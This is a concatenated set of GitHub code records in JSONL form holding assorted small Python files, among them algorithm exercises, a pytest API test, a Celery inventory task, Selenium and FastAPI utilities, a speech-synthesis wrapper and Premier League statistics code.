U_ds\n","repo_name":"ThanasisMattas/mattflow","sub_path":"mattflow/initializer.py","file_name":"initializer.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"48"} +{"seq_id":"40393407003","text":"# -*- coding: utf-8 -*-\n# 4등분 씩 분할하여 최종 결과를 도출해내는 문제이다.\n# queue를 사용하여 정사각형으로 인접한 4개의 숫자를 순서대로 queue에 삽입하고 4개를 비교하여 2번째로 큰 숫자를 row 기준으로 배열에 삽입한다.\n# 이러한 과정을 숫자 1개만 남을 때 까지 반복한다.\n\nimport sys\nfrom collections import deque\n\nN = int(input())\narr = []\ndq = deque()\ncol, row = 0, 0\narr_tmp = []\n\nfor idx in range(N):\n tmp = list(map(int, sys.stdin.readline().split()))\n arr.append(tmp)\n\nwhile N>1:\n for row in range(0, N, 2):\n for col in range(0, N, 2):\n dq.append(arr[row][col])\n dq.append(arr[row][col+1])\n dq.append(arr[row+1][col])\n dq.append(arr[row+1][col+1])\n\n N = N//2\n arr = [[] for _ in range(N)]\n idx = 0\n flag = 1\n\n while len(dq)>1:\n for _ in range(4):\n tmp = dq.popleft()\n arr_tmp.append(tmp)\n\n arr_tmp.sort()\n arr[idx].append(arr_tmp[-2])\n arr_tmp = []\n\n if flag == N:\n idx += 1\n flag = 1\n else: flag += 1\n \n if idx >= N: idx = 0\n\nprint(arr[0][0])","repo_name":"sonhl0723/algorithm","sub_path":"BOJ_restart/Divide and Conquer/17829.py","file_name":"17829.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"44976472983","text":"import pytest\nfrom requests import get, post\nfrom json import loads\n\nclass TestAPI:\n def setup(self):\n self.url = \"http://127.0.0.1:8000/calcular/\"\n\n def test_APIstatus(self):\n resp = get(self.url)\n assert resp.ok\n\n def test_APIresponse(self):\n resp = get(self.url)\n message = loads(resp.text)\n assert message[\"message\"] == \"Conexão com sucesso\"\n\n def test_POSTmethod(self):\n resp = post(self.url, json= {\"valor1\" : 10, \"valor2\": 6, \"operacao\": '*'})\n message = loads(resp.text)\n resposta_esperada = {\n \"resultado\":60\n }\n assert message == resposta_esperada\n","repo_name":"nerydyego/Mentorama_pro","sub_path":"Modulo_6/pyTestAtividade.py","file_name":"pyTestAtividade.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"762349937","text":"def lucas_loop(n):\n a, b = 2, 1\n lucas_list = []\n for _ in range(n):\n lucas_list.append(a)\n a, b = b, a + b\n print(lucas_list)\n\n\nif __name__ == '__main__':\n lucas_loop(4)\n","repo_name":"RemineralizedWater/comp348_a3","sub_path":"comp348_a3_q2a.py","file_name":"comp348_a3_q2a.py","file_ext":"py","file_size_in_byte":200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1067016568","text":"# -*- coding: utf-8 -*-\n\nimport datetime\n\nfrom tasks.celery_app import app\nfrom tasks.base_task import SqlAlchemyTask\nfrom tasks.stock import PushInventoryTask\nfrom models.inventory import InventoryModel\nfrom models.cooperate_roomtype import CooperateRoomTypeModel\n\nfrom constants import QUEUE_ORDER\nfrom utils.stock_push.inventory import InventoryPusher\nfrom tools.log import Log\n\n\n@app.task(base=SqlAlchemyTask, bind=True, queue=QUEUE_ORDER)\ndef modify_inventory(self, merchant_id, hotel_id, roomtype_id, price_type, change_num, start_date, end_date):\n session = self.session\n stay_days = get_stay_days(start_date, end_date)\n year_months = [(day.year, day.month) for day in stay_days]\n year_months = 
{}.fromkeys(year_months).keys()\n\n inventories = InventoryModel.get_by_merchant_hotel_roomtype_dates(\n session, merchant_id,\n hotel_id, roomtype_id, year_months)\n\n for day in stay_days:\n inventory = get_inventory_by_date(inventories, day.year, day.month)\n if not inventory:\n continue\n\n if change_num != 0:\n inventory.add_val_by_day(day.day, price_type, change_num)\n else:\n inventory.set_val_by_day(day.day, price_type, change_num)\n r = InventoryPusher(self.session).push_by_roomtype_id(roomtype_id)\n if r:\n session.commit()\n return inventories\n else:\n session.rollback()\n return None\n\ndef get_stay_days(start_date, end_date):\n aday = datetime.timedelta(days=1)\n days = []\n while start_date <= end_date:\n days.append(start_date)\n start_date = start_date + aday\n\n return days\n\ndef combin_year_month(year, month):\n return int(\"{}{:0>2d}\".format(year, month))\n\ndef get_inventory_by_date(inventories, year, month):\n _month = combin_year_month(year, month)\n for inventory in inventories:\n if inventory.month == _month:\n return inventory\n else:\n return\n\n\n@app.task(base=SqlAlchemyTask, bind=True)\ndef complete_in_four_months(self):\n roomtypes = CooperateRoomTypeModel.get_all(self.session)\n InventoryModel.insert_all_in_months(self.session, roomtypes, 13)\n\n","repo_name":"Hackforid/Ebooking","sub_path":"tasks/models/inventory.py","file_name":"inventory.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20973925865","text":"import math\n\nclass Prim:\n\n def min_key(self,key,visited,v):\n min = math.inf\n\n for i in range(v):\n if key[i] < min and i not in visited:\n min_idx = i\n min = key[i]\n return min_idx\n\n def minimum_spanning_tree(self,graph):\n # Find minimum edges\n vertices = len(graph)\n key = [math.inf] * vertices\n key[0] = 0\n parent = [None]*vertices\n parent[0] = -1\n visited = set()\n for i in range(vertices):\n\n u = self.min_key(key,visited,vertices)\n\n visited.add(u)\n\n for v in range(vertices):\n if graph[u][v] != 0 and v not in visited and graph[u][v] < key[v]:\n key[v] = graph[u][v]\n parent[v] = u\n\n \n\n \n\n \n\n\ngraph = [[0, 2, 0, 6, 0],\n [2, 0, 3, 8, 5],\n [0, 3, 0, 0, 7],\n [6, 8, 0, 0, 9],\n [0, 5, 7, 9, 0]]\nPrim().minimum_spanning_tree(graph)","repo_name":"VietDungTran0412/Data-Structure-and-Algorithms","sub_path":"Datastructure&algorithm/Algorithms/Graph/prim.py","file_name":"prim.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30315316626","text":"import cv2\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef condition():\n img_path ='mountain.jpeg'\n rgb = plt.imread(img_path)\n #convert to gray\n gray = cv2.cvtColor(rgb,cv2.COLOR_RGB2GRAY)\n\n #trashold value\n t1,t2 = 100,140\n c , p = 3 , 3\n epsilon = 1e-6\n row,col = gray.shape\n\n #first condition:s = 100, if r >= T1 and r <= T2; otherwise s = 10.\n condition1 = np.zeros((row,col),dtype=np.uint8)\n for x in range(row):\n for y in range(col):\n if(gray[x][y]>=t1 and gray[x][y]<=t2):\n condition1[x][y] = 100\n else:\n condition1[x][y]=10 \n \n #second condition:s = 100, if r >= T1 and r <= T2; otherwise s = r.\n condition2 = np.zeros((row,col),dtype = np.uint8)\n for x in range(row):\n for y in range(col):\n if(gray[x][y] >= t1 and gray[x][y] <= t2):\n condition2[x][y] = 100\n else:\n condition2[x][y] = gray[x][y]\n \n #third condition:s = c log(1 + r) .\n 
condition3 = np.zeros((row,col),dtype=np.uint8)\n condition3 = c * np.log(gray + 1)\n\n #fourth condition : s = c ( r + epsilon ) ^ p\n condition4 = np.zeros((row,col),dtype = np.uint8)\n condition4 = c * (epsilon + gray) ** p\n\n img_set = [rgb,gray,condition1,condition2,condition3,condition4]\n img_tittle = ['RGB','GRAY','FIRST CONDITION','SECOND CONDITION','THIRD CONDITION','FOURTH CONDITION']\n img_show(img_set,img_tittle)\n\ndef img_show(img_set,img_tittle):\n for i in range(len(img_set)):\n plt.subplot(2,3,i+1)\n plt.title(img_tittle[i])\n plt.imshow(img_set[i],cmap='gray')\n plt.savefig('condition.png')\n plt.tight_layout()\n plt.show()\n\nif __name__ == '__main__':\n condition()\n\n","repo_name":"ashifujjmanRafi/academic_4ru","sub_path":"4.1/ImageProcessing/assignment2/upgradeas2.py","file_name":"upgradeas2.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"7587167766","text":"import math\n\ndef snt(n):\n if n < 2:\n return False\n for i in range(2, int(math.sqrt(n)) + 1):\n if n % i == 0:\n return False\n return True\n\n\n\ndef run():\n n = input()\n dem = 0\n for i in n:\n if(snt(int(i))):\n dem += 1\n # print(dem)\n if snt(len(n)) and dem > len(n) - dem:\n print(\"YES\")\n else:\n print(\"NO\")\n\ndef main():\n t = int(input())\n for i in range(0, t):\n run() \n\nmain()","repo_name":"diepdao1708/Python-PTIT","sub_path":"UuTheNguyenTo.py","file_name":"UuTheNguyenTo.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8628375304","text":"from database.db import *\n\n@db_session\ndef register_user(telegram_user):\n if not User.exists(tg_id = telegram_user.id):\n user = User(\n tg_id=telegram_user.id, \n username=telegram_user.username, \n first_name=telegram_user.first_name, \n last_name=telegram_user.last_name)\n flush()\n return user\n else:\n print(f'User {telegram_user.id} exists')\n\n@db_session\ndef get_user(telegram_user):\n return User.get(tg_id=telegram_user.id)\n\n@db_session\ndef get_users():\n return User.select(int(u.tg_id) for u in User)\n \n@db_session()\ndef update_user(\n tg_id : int, \n username : str = None,\n first_name : str = None,\n last_name : str = None,\n is_banned : bool = None\n ):\n\n user_to_update = User.get(tg_id = tg_id)\n if username:\n user_to_update.username = username\n if first_name:\n user_to_update.first_name = first_name\n if last_name:\n user_to_update.last_name = last_name\n if is_banned:\n user_to_update.is_banned = is_banned\n if is_banned == False:\n user_to_update.is_banned = is_banned\n","repo_name":"ovsij/aiogram-ponyorm-template","sub_path":"database/crud.py","file_name":"crud.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20309697611","text":"from selenium import webdriver\nfrom selenium.webdriver.firefox.options import Options\nfrom selenium.webdriver import Proxy\n\n\nclass FirefoxDriver:\n def __init__(self, ):\n self.driver = None\n self.proxy = None\n self.proxy_settings = None\n self.firefox_options = Options()\n\n def set_proxy(self, proxy):\n self.proxy = proxy\n\n def start(self):\n\n self.firefox_options.headless = True\n\n # Create a Proxy object using the BrowserMob proxy server\n if self.proxy:\n self.proxy_settings = Proxy({\n \"httpProxy\": self.proxy.proxy,\n \"sslProxy\": self.proxy.proxy\n })\n 
self.firefox_options.proxy = self.proxy_settings\n\n # Create a new instance of the Firefox driver\n self.driver = webdriver.Firefox(options=self.firefox_options)\n","repo_name":"LiuWilson00/web-crawler","sub_path":"modules/firefox_driver.py","file_name":"firefox_driver.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19458780671","text":"import sys\n\nfrom fastapi import APIRouter, Depends\n\nfrom Models.models import Coordinate, Appointment, MakeAppointment\nfrom Models.user import UserJSON\nfrom Utils.api_psychos import get_psychologist_list, get_psycho_by_id\nfrom Utils.appointment import create_appointment, get_appointment_by_id\nfrom Utils.auth import get_current_user\nfrom Utils.call_logs import create_call_log\nfrom Utils.emergency_call import distance_by_long_and_lat\nfrom Utils.healthcare import get_health_facility_by_id\nfrom Utils.read_file import read_hf_file, read_appointment_file\nfrom Utils.users import not_user\n\nappointment_calls = APIRouter(tags=['Appointment Calls'])\nurl = 'https://ca-sereneapp.braveisland-f409e30d.southeastasia.azurecontainerapps.io/'\n\nhealthcare_json = \"Data/health_facilities.json\"\napp_json = \"Data/appointment.json\"\nfacilities = read_hf_file(healthcare_json)\nappointments = read_appointment_file(app_json)\n\n\n@appointment_calls.get('/closest_fac')\nasync def get_closest_fac(longitude: float, latitude: float, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n\n closest_fac = {}\n current_coor = Coordinate(longitude=longitude, latitude=latitude)\n current_distance = sys.maxsize\n\n for facility in facilities:\n facility_coor = Coordinate(longitude=facility['coordinates']['longitude'],\n latitude=facility['coordinates']['latitude'])\n dis = distance_by_long_and_lat(facility_coor, current_coor)\n\n if dis < current_distance:\n current_distance = dis\n closest_fac = facility\n\n return [{\"Message\": \"Here is the closest health facility to you\"}, {\"closest_fac\": closest_fac}]\n\n\n@appointment_calls.get('/get_all_psychologists')\nasync def get_all_psychologists(user: UserJSON = Depends(get_current_user)):\n not_user(user)\n return get_psychologist_list()\n\n\n@appointment_calls.get('/get_psychologists_by_id')\nasync def get_psychologist_by_id(psychologist_id: int, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n\n psycho = get_psycho_by_id(psychologist_id)\n return psycho\n\n\n@appointment_calls.get('/available_psychologists')\nasync def get_available_psychologists_based_on_facility(longitude: float, latitude: float, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n\n closest_fac_res = await get_closest_fac(longitude=longitude, latitude=latitude, user=user)\n\n closest_fac = closest_fac_res[1]['closest_fac']\n psycho_ids = closest_fac['psychologist_list']\n\n all_psychos = get_psychologist_list()\n list_of_psychos_in_fac = []\n\n for psycho in all_psychos:\n if psycho['psychologist_id'] in psycho_ids:\n list_of_psychos_in_fac.append(psycho)\n\n return list_of_psychos_in_fac\n\n\n@appointment_calls.get('/find_psychologists_location')\nasync def find_psychologists_location_by_id(psychologist_id: int, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n facs_list = []\n for fac in facilities:\n if psychologist_id in fac['psychologist_list']:\n facs_list.append(fac)\n return facs_list\n\n\n@appointment_calls.post('/make_appointment')\nasync def make_appointment(psychologist_id: str, 
health_facility_id: str, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n add_appointment = MakeAppointment(user_id=user.dict()['id'], psychologist_id=psychologist_id, health_facility_id=health_facility_id)\n new_appointment = Appointment(\n appointment_id=add_appointment.dict()['appointment_id'],\n user_id=add_appointment.dict()['user_id'],\n psychologist_id=add_appointment.dict()['psychologist_id'],\n health_facility_id=add_appointment.dict()['health_facility_id'],\n attended_status=add_appointment.dict()['attended_status']\n )\n made_appointment = await create_appointment(add_appointment=new_appointment, user=user)\n return made_appointment\n\n\n@appointment_calls.post('/make_appointment_call')\nasync def make_appointment_call(appointment_id: str, user: UserJSON = Depends(get_current_user)):\n not_user(user)\n\n caller_number = user.dict()['phone_number']\n\n appointment = await get_appointment_by_id(appointment_id)\n hf_id = appointment['health_facility_id']\n\n hf = await get_health_facility_by_id(hf_id)\n callee_number = hf['phone_number']\n\n made_call = []\n if callee_number and caller_number:\n made_call = await create_call_log(callee_number=callee_number, caller_number=caller_number, user=user)\n\n return made_call\n\n","repo_name":"vincentfranstyo/Hospicall","sub_path":"Utils/appointment_calls.py","file_name":"appointment_calls.py","file_ext":"py","file_size_in_byte":4503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32172347445","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Aug 23 14:53:19 2018\n\n@author: Franc\n\"\"\"\nimport numpy as np\nimport os \nfiles = os.listdir('prediction10')\nfiles_test = [x for x in files if x.startswith('a')]\nfiles_sample = [x for x in files if x.startswith('s')]\nobj = pd.read_csv('prediction10/%s'%files_test[0]).sort_values('SK_ID_CURR').reset_index(drop=True)\ny_true = df_all.loc[df_all.SK_ID_CURR.isin(obj.SK_ID_CURR),['SK_ID_CURR','TARGET']]\n\n#for i in range(96,110): \nfor file in files_test:\n pred = pd.read_csv('prediction10/%s'%file).sort_values('SK_ID_CURR')\n# pred = np.where(pred.TARGET+pred.TARGET_CAT>1,\n# pred[['TARGET','TARGET_CAT']].max(axis=1),\n# pred[['TARGET','TARGET_CAT']].min(axis=1), \n# pred[['TARGET','TARGET_CAT']].mean(axis=1)))\n #y_true[file] = pred.TARGET\n y_true = y_true.merge(pred, on = 'SK_ID_CURR', how='left')\n #print(roc_auc_score(y_true.iloc[:,1:2], pred.TARGET))\ny_true['mean'] = y_true.iloc[:,2:].mean(axis=1)\n\n#roc_auc_score(y_true.iloc[:,1:2], y_true['mean'])\n\nsubmit = pd.DataFrame(dict(SK_ID_CURR = y_true['SK_ID_CURR'].astype('int'),\n TARGET = y_true['mean']))\nsubmit.to_csv('prediction10/asubmit_3.csv',index=False)\n","repo_name":"Franciszz/Competitions","sub_path":"# Credit/code/main_submission_process.py","file_name":"main_submission_process.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"48"} +{"seq_id":"39733851216","text":"import os\nimport numpy as np\n\nimport torch\nimport torch.optim as optim\n\nfrom nes_py.wrappers import JoypadSpace\nimport gym_super_mario_bros\nfrom gym_super_mario_bros.actions import SIMPLE_MOVEMENT\n\nfrom cnn import CNN\nfrom d4pg import D4PGActor, D4PGCritic\nfrom rnd import RNDTargetModel, RNDPredictorModel\n\nfrom noise import OUNoise\n\nfrom memory import Memory\nfrom agent import Agent\nfrom optimizer import Optimizer\n\n\nDEVICE = torch.device(\"cuda:0\" if torch.cuda.is_available() 
else \"cpu\")\n\n# ORIGINAL\n# env = gym_super_mario_bros.make('SuperMarioBros-v0')\n# BLACK\nenv = gym_super_mario_bros.make('SuperMarioBros-v1')\n# PIXEL\n# env = gym_super_mario_bros.make('SuperMarioBros-v2')\nenv = JoypadSpace(env, SIMPLE_MOVEMENT)\n\nstate_info = env.reset()\naction_info = env.action_space.sample()\naction_size = env.action_space.n\n\nprint('states looks like {}'.format(state_info))\n\nprint('states len {}'.format(state_info.shape))\nprint('actions len {}'.format(action_size))\n\n\n# hyperparameters\nALPHA = 1\nGAMMA = 0.99\nTAU = 2e-1\nUPDATE_EVERY = 16\nBUFFER_SIZE = int(1e5)\nBATCH_SIZE = 128\nLR_ACTOR = 1e-4\nLR_CRITIC = 1e-4\n\nADD_NOISE = True\n\nRND_LR = 5e-5\nRND_OUTPUT_SIZE = 128\nRND_UPDATE_EVERY = 32\n\nCHECKPOINT_CNN = './checkpoint_cnn.pth'\nCHECKPOINT_ACTOR = './checkpoint_actor.pth'\nCHECKPOINT_CRITIC = './checkpoint_critic.pth'\nCHECKPOINT_RND_TARGET = './checkpoint_rnd_target.pth'\nCHECKPOINT_RND_PREDICTOR = './checkpoint_rnd_predictor.pth'\n\ncnn = CNN().to(DEVICE)\n\nactor_model = D4PGActor( cnn.state_size, action_size ).to(DEVICE)\nactor_target = D4PGActor( cnn.state_size, action_size ).to(DEVICE)\n\ncritic_model = D4PGCritic( cnn.state_size, action_size ).to(DEVICE)\ncritic_target = D4PGCritic( cnn.state_size, action_size ).to(DEVICE)\n\noptimizer_actor = optim.Adam( list(actor_model.parameters()) + list(cnn.parameters()), lr=LR_ACTOR, weight_decay=1e-4 )\noptimizer_critic = optim.Adam( critic_model.parameters(), lr=LR_CRITIC, weight_decay=1e-4 )\n\nrnd_target = RNDTargetModel( cnn.state_size ).to(DEVICE)\nrnd_predictor = RNDPredictorModel( cnn.state_size + action_size ).to(DEVICE)\nrnd_optimizer = optim.Adam( rnd_predictor.parameters(), lr=RND_LR, weight_decay=1e-4 )\n\nif os.path.isfile(CHECKPOINT_CNN):\n cnn.load_state_dict(torch.load(CHECKPOINT_CNN))\n \n actor_model.load_state_dict(torch.load(CHECKPOINT_ACTOR))\n actor_target.load_state_dict(torch.load(CHECKPOINT_ACTOR))\n\n critic_model.load_state_dict(torch.load(CHECKPOINT_CRITIC))\n critic_target.load_state_dict(torch.load(CHECKPOINT_CRITIC))\n\n rnd_target.load_state_dict(torch.load(CHECKPOINT_RND_TARGET))\n rnd_predictor.load_state_dict(torch.load(CHECKPOINT_RND_PREDICTOR))\n\n\ngood_memory = Memory(BUFFER_SIZE, BATCH_SIZE)\nbad_memory = Memory(BUFFER_SIZE, BATCH_SIZE)\n# good_memory = PrioritizedMemory(BUFFER_SIZE, BATCH_SIZE)\n# bad_memory = PrioritizedMemory(BUFFER_SIZE, BATCH_SIZE)\n\nnoise = OUNoise(action_size)\n\nagent = Agent(DEVICE, cnn, actor_model, noise)\noptimizer = Optimizer(\n DEVICE, \n good_memory, bad_memory,\n cnn, \n actor_model, actor_target, optimizer_actor, \n critic_model, critic_target, optimizer_critic, \n rnd_target, rnd_predictor, rnd_optimizer,\n ALPHA, GAMMA, TAU, UPDATE_EVERY, BUFFER_SIZE, BATCH_SIZE)\n\n\n# t_steps = 500\nn_episodes = 100\n\nfor episode in range(n_episodes):\n\n total_reward = 0\n life = 2\n\n state = env.reset()\n\n while True:\n # for t in range(t_steps):\n\n # action = env.action_space.sample()\n action = agent.act( state, ADD_NOISE )\n\n next_state, reward, done, info = env.step(action)\n\n actor_loss, critic_loss, rnd_loss = optimizer.step(state, action, reward, next_state, done)\n\n env.render()\n\n total_reward += reward\n\n print('\\rEpisode: {} \\tTotal: \\t{} \\tReward: \\t{} \\tLife: \\t{} \\tActor: \\t{:.5f} \\tCritic: \\t{:.5f} \\tRND: \\t{:.5f}'.format( episode + 1, total_reward, reward, life, actor_loss, critic_loss, rnd_loss ), end='')\n\n if done:\n break\n\n if info['life'] < life:\n total_reward = 0\n life = 
info['life']\n\n state = next_state\n\n cnn.checkpoint(CHECKPOINT_CNN) \n \n actor_model.checkpoint(CHECKPOINT_ACTOR)\n critic_model.checkpoint(CHECKPOINT_CRITIC)\n\n rnd_target.checkpoint(CHECKPOINT_RND_TARGET)\n rnd_predictor.checkpoint(CHECKPOINT_RND_PREDICTOR)\n\nenv.close()\n","repo_name":"ibrahimth/Studies-and-Researches","sub_path":"ML Python/Super_Mario_Bros_D4PG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7639697936","text":"\"\"\"\nThis file contain methods that can be used to perform basic statistical analysis about the premier league teams. \n\n\"\"\"\nfrom dataclasses import dataclass\nimport ast, csv, time\nfrom prettytable import PrettyTable\n\n@dataclass\nclass CurrentPremierLeagueTableHeader:\n position: str\n club: str\n played: int\n won: int\n drawn: int\n lost: int\n gf: int\n ga: int\n gd: int\n points: int\n form: list\n next_game: list\n\n@dataclass\nclass PastPremierLeagueTableHeader:\n position: str\n club: str\n played: int\n won: int\n drawn: int\n lost: int\n gf: int\n ga: int\n gd: int\n points: int\n form: list\n\nclass PremierLeagueClub(CurrentPremierLeagueTableHeader):\n \"\"\" \"\"\"\n\n def get_next_game(self) -> PrettyTable():\n \"\"\"\n Returns PrettyTable object that contains details information about the clubs\n next game data.\n\n example:\n >>> obj = run.view_premier('Manchester United')\n obj.get_win_draw_lost_rate()\n +-------------------+-------------+-------------+-----------+--------------+\n | Club | Action | Wining rate | draw rate | Loosing rate |\n +-------------------+-------------+-------------+-----------+--------------+\n | Manchester United | Probability | 0.5 | 0.21 | 0.29 |\n +-------------------+-------------+-------------+-----------+--------------+\n \"\"\"\n next_game_table = PrettyTable()\n # converting string list literal into normal list\n fixture = ast.literal_eval(self.next_game)\n\n next_game = [\n self.club,\n \"vs\",\n ]\n\n for index, item in enumerate(fixture):\n if index == 0 or index == 1 or index == 3:\n next_game.append(item)\n else:\n continue\n\n next_game_table.field_names = [\"Current Team\", \" \", \"Opponent\", \"date\", \"time\"]\n next_game_table.add_row(next_game)\n return next_game_table\n\n def get_wdl_rate(self) -> PrettyTable():\n \"\"\"\n calculates the win rate, draw rate and loose rate of a team.\n calculations:\n win_rate = number_of_games_won/number_of_games_played\n draw_rate = number_of_games_drawn/number_of_games_played\n lose_rate = number_of_games_lost/ number_of_games_played\n example:\n >>> obj = run.view_premier('Manchester United')\n obj.get_wdl_rate()\n\n +-------------------+-------------+-------------+-----------+------------------+\n | Club | Games Played | Wining rate | draw rate | Loosing rate |\n +-------------------+-----------------+-------------+-----------+--------------+\n | Manchester United | 37 | 0.5 | 0.27 | 0.23 |\n +-------------------+-------------+-------------+-----------+------------------+\n \"\"\"\n pretty_table = PrettyTable()\n\n wdl = [\n self.club,\n self.played,\n round(self.won / (self.played) * 1, 2),\n round(self.drawn / (self.played) * 1, 2),\n round(self.lost / (self.played) * 1, 2),\n ]\n pretty_table.field_names = [\n \"Club\",\n \"Games Played\",\n \"Win rate\",\n \"draw rate\",\n \"Loose rate\",\n ]\n\n pretty_table.add_row(wdl)\n return pretty_table\n\n def compare(self, other_team) -> tuple(PrettyTable()):\n 
\"\"\"\n Compares two teams wdl rate and displays it in a tabular format\n \"\"\"\n clubs = PremierLeagueClub.create_premier_clubs()\n other_table = PrettyTable()\n\n for obj in clubs:\n if obj.club == other_team:\n # construct a pretty table for the other_team wdl_rate table.\n wdl = [\n obj.club,\n obj.played,\n round(obj.won / (obj.played) * 1, 2),\n round(obj.drawn / (obj.played) * 1, 2),\n round(obj.lost / (obj.played) * 1, 2),\n ]\n other_table.field_names = [\n \"Club\",\n \"Games Played\",\n \"Win rate\",\n \"draw rate\",\n \"Loose rate\",\n ]\n other_table.add_row(wdl)\n\n # where pretty table magic happens\n print(\n f\"{self.club.upper()} WIN, DRAW & LOOSE RATE AFTER {self.played} GAMES\"\n )\n time.sleep(5)\n print(self.get_wdl_rate())\n time.sleep(3)\n\n print(\n f\"{obj.club.upper()} WIN, DRAW & LOOSE RATE AFTER {obj.played} GAMES\"\n )\n time.sleep(5)\n print(other_table)\n else:\n continue\n\n # return other_table\n\n @staticmethod\n def create_premier_clubs() -> list:\n \"\"\"\n Function to read through a csv file, instantiate `PremierLeagueClub` class.\n It's stores object created in a list.\n returns a list of objects.\n \"\"\"\n store_obj = []\n \n # read the csv\n with open(\"table_data\\English Premier League.csv\", \"r\") as file:\n reader = csv.DictReader(file)\n for row in reader:\n # create instance for each team.\n obj = PremierLeagueClub(\n position=int(row[\"Position\"]),\n club=row[\"Club\"],\n played=int(row[\"Played\"]),\n won=int(row[\"Won\"]),\n drawn=int(row[\"Drawn\"]),\n lost=int(row[\"Lost\"]),\n gf=int(row[\"GF\"]),\n ga=int(row[\"GA\"]),\n gd=int(row[\"GD\"]),\n points=int(row[\"Points\"]),\n form=row[\"Form\"],\n next_game=row[\"Next Game\"],\n )\n store_obj.append(obj)\n return store_obj\n","repo_name":"gilbertekalea/PremierLeague","sub_path":"premier_league/current_report.py","file_name":"current_report.py","file_ext":"py","file_size_in_byte":6103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33230224772","text":"#\n# inference_multispeaker_synthesis.py\n#\n# Module for interfacing with MultispeakerSynthesis. All dependencies\n# for MultispeakerSynthesis must have been properly installed first,\n# with the multispeaker_synthesis repo having been placed adjacent\n# to the cloud_inference_server code. Don't forget to add the model!\n#\n# As a reminder, every single method supported by handlers must\n# return a tuple, with [0] = HTTP code and [1] = content (or error\n# message), and [2] = key for whatever postprocessing you need\n# (Ex) \"encode_base64\")\n\nfrom inference_modules_config import *\n\nimport http\n\nclass MultispeakerSynthesis:\n # Given model variants location, how do we get to synthesizer models? \n _model_variants_synthesizer_subpath = \"synthesizer\"\n _model_suffix = \".pt\"\n _vocoder = \"sv2tts\"\n\n def __init__(self, dynamic_load_class):\n \"\"\"\n On startup, load the synthesizer into memory in anticipation of\n incoming requests. All of this is done by the kotakee companion\n utility code, so there's no copies of the same code to maintain. \n \"\"\"\n print(\"[DEBUG] MultispeakerSynthesis - Initializing model variant \"+str(multispeaker_synthesis_model_num)+\"...\")\n\n # Now go ahead and load the kotakee companion files that we'll\n # be using. This is to avoid duplicate code and increase \n # simplicity of implementation. 
\n self._utility_class_type = dynamic_load_class(module_name=multispeaker_synthesis_kotakee_utility, \n class_name=multispeaker_synthesis_kotakee_utility_class)\n assert self._utility_class_type is not None\n self._utility_class = self._utility_class_type(\n model_num = multispeaker_synthesis_model_num, \n model_variants_location = multispeaker_synthesis_models_location, \n speakers_location = multispeaker_synthesis_speakers_location, \n inference_location = multispeaker_synthesis_inference_location, \n inference_class_name = multispeaker_synthesis_inference_class_name,\n vocoder = self._vocoder\n )\n\n def synthesize_text(self, speaker_id, text):\n \"\"\"\n Given the speaker id and the text in one large string, go and \n synthesize a wav and provide that back to the handler, who will\n encode it in base64 to be consumed by users. \n \"\"\"\n # If we get a byte array or a bytes-like object, make sure it's a\n # string. \n if isinstance(text, (bytes, bytearray)):\n text = text.decode()\n\n # Use the utility to manage everything. We will get an array of\n # wavs back. \n wavs = self._utility_class.speaker_synthesize_speech(texts=[text], speaker_id=speaker_id, utterance_id=\"\")\n if wavs is None or len(wavs) == 0:\n return http.HTTPStatus.BAD_REQUEST, \"Speech Synthesis failed. Please verify speaker id.\", None\n \n return http.HTTPStatus.OK, wavs, \"encode_base64_list\"","repo_name":"ArthurlotLi/cloud_inference_server","sub_path":"inference_modules/multispeaker_synthesis.py","file_name":"multispeaker_synthesis.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14988977000","text":"d = {9103976271:[(\"Reina\", \"Meinhard\"), (\"Memphis\", \"Tennessee\")],\n4199392609:[(\"Stephanie\", \"Bruce\"), (\"Greensboro\", \"North Carolina\")],\n9099459979:[(\"Ermes\", \"Angela\"), (\"Dallas\", \"Texas\")],\n6123479367:[(\"Lorenza\", \"Takuya\"), (\"Indianapolis\", \"Indiana\")],\n7548993768:[(\"Margarete\", \"Quintin\"), (\"Raleigh\", \"North Carolina\")]}\n\nnumber = int(input())\n\nif number in d:\n res = d[number]\n print(f\"{res[0][0]} {res[0][1]} from {res[1][0]}, {res[1][1]}\")\nelse:\n print(\"nothing was found\")\n\nres = d.get(number)\nif res:\n print(f\"{res[0][0]} 